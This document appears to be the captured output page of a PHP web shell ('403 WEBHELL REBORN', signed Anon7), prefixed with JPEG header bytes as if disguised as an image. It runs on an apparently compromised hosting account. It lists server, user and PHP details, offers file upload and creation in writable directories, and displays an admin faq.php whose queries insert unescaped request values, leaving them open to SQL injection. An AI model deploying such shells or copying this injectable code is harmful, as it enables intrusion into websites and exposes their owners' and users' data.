ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache/2
System : Linux vps.phamthanh.local 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User : benhviencoc7 ( 1008)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory :  /home/benhviencoc7/public_html/adminvn/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /home/benhviencoc7/public_html/adminvn/faq.php
<?php

/*----------------------------------------*\
|             Copyright © C-ILY            | 
|            Phone: 0983.998.994           |
|             Y!m: notepad.html            |
|         Email: truongpv87@gmail.com      |
\*----------------------------------------*/

define('CILY',true);
include('../#includes/config.php');
if(check_log() == true && check_level() >= 4) {

    if($_GET['type'] == 'add' && strlen($_POST['title']) >=3 && strlen($_POST['content']) >= 3){
        $_SESSION['sub_faq'] = $_POST['sub'];
        @mysql_query("INSERT INTO cily_faqs (faq_name, faq_content, faq_fullname, faq_email, faq_cat, faq_reply, faq_order) VALUES ('".addsla($_POST['title'])."', '".addsla($_POST['content'])."', '".addsla($_POST['fullname'])."', '".$_POST['email']."', '".$_POST['sub']."', '".$_POST['reply']."', '".$_POST['order']."')");
        header('Location: index.php?m=10&sm=1');
    }
    
    elseif($_GET['type'] == 'edit'){
        unset($_SESSION['sub_faq']);
        @mysql_query("UPDATE cily_faqs SET faq_name = '".addsla($_POST['title'])."', faq_content = '".addsla($_POST['content'])."', faq_fullname = '".addsla($_POST['fullname'])."', faq_email = '".$_POST['email']."', faq_cat = '".$_POST['sub']."', faq_reply = '".addsla($_POST['reply'])."', faq_order = '".$_POST['order']."' WHERE id = ".$_POST['id']);
        header('Location: index.php?m=10&sm=1');
    }
    
    elseif($_GET['type'] == 'del' && $_POST['action'] == 1 && $_POST['id']){
        $total = count($_POST['id']);
        for($i=0; $i<$total; $i++) {
            @mysql_query("DELETE FROM cily_faqs WHERE id = ".$_POST['id'][$i]);
        }
        header('Location: index.php?m=10&sm=1');
    }
    elseif($_GET['type'] == 'del' && $_POST['action'] == 2){
    $idm = $_POST["rowid"];
    $sttm = $_POST["idorder"];
    $lap=count($idm);
    for($i=0; $i<$lap; $i++) {
            @mysql_query("UPDATE cily_faqs SET faq_order = ".$sttm[$i]." WHERE id = ".$idm[$i]);
    }
        Redirect("Thực hiện thành công","index.php?m=10&sm=1");
    }
    elseif($_GET['type'] == 'state'){
        $getid = $_GET['id'];
        $getoc = $_GET['oc'];
    @mysql_query("UPDATE cily_faqs SET faq_home = '".$getoc."' WHERE id = ".$getid);
         
        Redirect("","index.php?m=10&sm=1");
    }
    
    else header('Location: index.php?m=10&sm=1');
}

else echo "Hacking attempt";


?>

Anon7 - 2021